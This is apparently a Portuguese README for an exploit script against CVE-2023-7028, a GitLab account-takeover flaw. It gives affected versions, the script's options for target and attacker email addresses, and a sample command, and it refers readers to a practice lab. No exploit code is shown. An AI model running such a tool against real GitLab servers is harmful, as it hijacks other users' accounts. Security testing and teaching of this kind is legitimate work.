
Exploit para CVE-2023-7028 - GitLab CE/EE
⚠️ Este exploit tem finalidade defensiva e deve ser utilizado por profissionais de cibersegurança para identificar possíveis servidores GitLab vulneráveis.
Produtos e versões afetados:
| Produto | Versões afetadas |
|---|---|
| GitLab Community Edition e Enterprise Edition | < 16.1.6 < 16.2.9 < 16.3.7 < 16.4.5 < 16.5.6 < 16.6.4 < 16.7.2 |
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER
options:
-h, --help show this help message and exit
-u URL, --url URL GitLab URL (HTTP or HTTPS)
-t TARGET, --target TARGET
Target email address
-a ATTACKER, --attacker ATTACKER
Attacker email address
Exemplo: python CVE-2023-7028.py -u https://gitlab.example.com -t [email protected] -a [email protected]
Você pode usar a Sala do Try Hack Me GitLab CVE-2023-7028 para testar o exploit, pois ela executa uma versão vulnerável afetada pela CVE-2023-7028.
